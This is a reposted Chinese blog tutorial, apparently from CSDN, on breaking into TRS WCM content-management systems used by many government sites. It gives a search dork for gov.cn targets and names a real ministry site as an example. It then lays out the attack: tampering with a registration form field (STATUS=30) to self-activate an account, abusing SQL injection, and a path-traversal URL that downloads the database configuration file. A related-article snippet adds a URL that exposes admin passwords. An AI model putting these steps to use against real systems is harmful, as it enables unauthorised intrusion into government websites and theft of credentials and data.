(转载)TRS内容管理平台用户注册逻辑漏洞

最新推荐文章于 2024-08-26 17:37:40 发布
转载 最新推荐文章于 2024-08-26 17:37:40 发布 · 336 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/cookies9/p/3915028.html
文章标签:

#数据库 #java

本文详细介绍了TRSCMS内容管理系统中的一项安全漏洞,包括如何利用该漏洞进行注册并获得后台访问权限,以及如何通过SQL注入直接操作数据库,下载数据库配置文件等内容。

首先

site:gov.cn inurl:WCM

TRS 的内容管理系统是国内政府网站使用最多的系统之一





如上面所说:外交部 http://wcm.fmprc.gov.cn/wcm/



网址加上:wcm/console/auth/reg_newuser.jsp

http://localhost:9999/wcm/console/auth/reg_newuser.jsp

注册,注意使用fireBUG修改表单,注意下图



即将随意表单改成 STATUS 值为 30,或增加STATUS字段表单。

然后提交注册



虽然说是“请等待开通!”,但实际上已经开通了,因为 STATUS 字段让我们改成正常了。

直接登陆



虽然没什么权限,但后台存在大量注入等漏洞

如:







可以通过注入直接操作数据库了。

http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx

直接下载数据库配置文件

转载于:https://www.cnblogs.com/cookies9/p/3915028.html

aocong5568
关注
TRS内容管理平台用户注册逻辑漏洞
ytfhjhv的博客
11-16 1673
TRS内容管理平台用户注册逻辑漏洞
TRS cms用户注册漏洞
2ed
06-25 3809
据了解TRS WCM涵盖网站建立、内容服务、内容传递等内容价值链的各个方面,将结构化和非结构化信息提供给所有用户。 既然在外网能访问TRS WCM,那就方便许多了,由于是第一次遇到此系统,所以去wooyun上搜了一下相关漏洞利用方式,发现其实wooyun上公布的对这个系统的漏洞利用方式还是很多的,都是些高危漏洞,其中有三个高危漏洞可以很好的利用一下,TRS WCM多为gov站点使用,不过这里遇到了...
TRS的WCM历史漏洞
weixin_42140534的博客
07-30 6948
1访问网站的登录页 看到TRS WCM知道为北京拓尔思开发的一个平台,这个平台是存在相关漏洞的 2 在网址后面添加查看管理员密码的链接 wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin 3在地址栏中输入xxx:8080/wcm/app/login.jsp回车即可成功登录,且账号为system ...
TRS CMS(拓尔思CMS) 漏洞集合
热门推荐
收集盒 Book box
08-09 1万+
TRS(拓尔思)WCM 文件上传漏洞 影响版本: WCM5.2 WCM6.1 漏洞描述: TRSWCM是拓尔思系列产品的重要组成部分,服务于信息资源的发布。 Lee在对WCM6.1(STD1091SP2)进行风险评估的时候发现,file_upload.html未做访问限制,攻击者可以匿名访问上传页面进行文件上传操作。 说明: file/file_upload.html info
TRS WCM内容协作平台
07-08
TRS WCM内容协作平台是一款专为媒体行业设计的高级内容管理解决方案,它集成了协作、行业特性和开放性,旨在优化组织效率并提升核心竞争力。该平台的核心在于内容的采集、创建、加工、存储、分析、发布、反馈和协作...
TRS内容协作平台用户手册
"TRS内容协作平台用户手册,由北京拓尔思信息技术有限公司出版,详细介绍了TRS内容协作平台TRSWCM)的使用流程和功能。" TRS内容协作平台TRSWCM)是由北京拓尔思信息技术有限公司开发的一款基于Java技术和...
TRS内容管理产品体系架构综述
07-08
TRS内容管理产品体系以CIO标准为基础,旨在构建一个新一代的内容管理平台,该平台具有协作性、行业性和开放性的特点,满足企业全面的内容管理需求。CIO标准强调了内容生命周期管理、行业针对性和系统开放性,以确保...
转载TRS的WCM6漏洞权限绕过以及绕过密码的登陆方式
aocong5568的博客
08-15 1109
转载于:http://www.2cto.com/Article/201302/191261.html 1、由来:建立在 TRS的WCM6可直接获取管理员密码 漏洞的基础上 2、首先访问wcm目录,会自动跳转到登录页面: 3、在网址后加上查看管理员密码的链接: wcm/infoview.do?serviceid=wcm6_user&Meth...
TRS WCM 几处突破点
工作ing
12-09 6338
TRS WCM
wooyun.7z乌云数据库
10-22
wooyun.7z乌云数据库
TRSWCMV7.0数据字典
06-01
本手册介绍了该系统涉及到的关键表的 数据表设计的说明,包含表名、表字段设计等,便于使用者更深入的了解 TRS WCM 以及基于此系统 做数据的处理和开发。
web cms trs二次开发手册
10-30
1.1 文档的建立  本文档是专门针对WCM产品的二次开发而编写的指导性手册;它从设计原理和应用实践两个方面详细阐述了有关二次开发中所涉及的问题。  本文档是由TRS WCM产品开发组共同建立和维护的。在实际的应用中,WCM开发组有义务不断更新和补充完善本文档。 1.2 文档的组织  本文档在内容组织上,注重设计原理和应用实践两个方面并重。因为我们认为,理解设计原理是更好应用的基础,也是较深层的二次开发所必须了解的内容。  本文档在布局上,按照下面的方式安排:  本文档首先阐述了WCM中最重要的对象模型和体系,它是应用和扩展WCM的最基础、最核心的内容;  然后分别阐述了WCM中最重要的几个应用内容,包括WCM对象体系扩展、系统安全管理、系统配置、任务和计划调度及工作流支持。  最后讨论了WCM应用开发中所涉及的几个应用层面上的问题,这些问题包括并发操作的支持、中文问题及多国语言的支持,以及如何提高WCM二次开发的质量和效率。 1.3 文档的目标 在阅读完本文档后,您应当明确理解和掌握的内容是:  如何应用和扩展WCM对象体系;  如何熟练应用WCM中有关系统配置、任务和计划调度、工作流支持等关键性的扩展性支持开发;  如何熟练解决WCM应用开发中的一些应用层问题,如并发操作支持、中文问题和多国语言支持等。  最终:您应当能够熟练掌握和应用本文档中所有WCM扩展开发内容。
wooyu漏洞库YYDS!!!入门之道:重现乌云漏洞
最新发布
honest_gg的博客
08-26 2233
wooyun乌云漏洞库手把手搭建教程,最全没有之一!!!
【资源学习】wooyun镜像站
Websec
03-19 7134
wooyun镜像站地址:https://wooyun.kieran.top
wooyun镜像容器逆向分析
qingjie0ng的博客
08-16 1757
docker镜像进行逆向,可分析推出dockerfile文件
发掘安全之奥秘:Wooyun开源项目深度探索
gitblog_00069的博客
06-24 960
发掘安全之奥秘:Wooyun开源项目深度探索 在网络安全日益重要的今天,每一个细小的漏洞都可能成为威胁数据安全的巨大隐患。为此,我们深入挖掘了一款名为**Wooyun(乌云)**的开源宝藏,它不仅仅是一个工具集合,更是安全研究者和web开发者不可或缺的伙伴。让我们一同揭开它的神秘面纱。 1. 项目介绍 Wooyun,对于安全社区来说,这个名字承载着历史与传承。这个开源项目专注于网络安全领域,特别...
推荐开源项目:wooyun_public - 乌云公开漏洞与知识库爬虫和搜索
gitblog_00065的博客
05-11 665
推荐开源项目:wooyun_public - 乌云公开漏洞与知识库爬虫和搜索 1、项目介绍 wooyun_public 是一个由Python编写的爬虫项目,用于抓取并索引乌云平台的公开漏洞和知识库信息。项目提供了友好的界面,让用户能够方便地浏览和搜索这些宝贵的数据,对于安全研究人员、开发人员以及对此领域感兴趣的人来说,这是一个极其实用的工具。 2、项目技术分析 爬虫部分: 使用强大的Scrapy...
本地搭建Wooyun漏洞()——Ubuntu 18.04下搭建WooYun漏洞
浅浅的博客
08-23 3425
本文参考https://github.com/grt1st/wooyun_search 这篇文章是建立在已经搭建好LAMP环境的基础上进行的,搭建方法可见:本地搭建Wooyun漏洞()——Ubuntu 18.04下搭建LAMP环境 一、下载资源 访问https://github.com/grt1st/wooyun_search,下载所需文件。 下载该ZIP文件(文件名为:wooyu...
TRS WCM 6.5用户手册:内容协作与管理平台
1. 统一的内容平台:它集成了各种内容管理功能,提供了一个集中化的操作环境。 2. 无技术门槛,易学易用:设计人性化,使得非技术人员也能轻松上手。 3. 集成企业协作能力:支持多用户协同工作,促进团队间的沟通和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值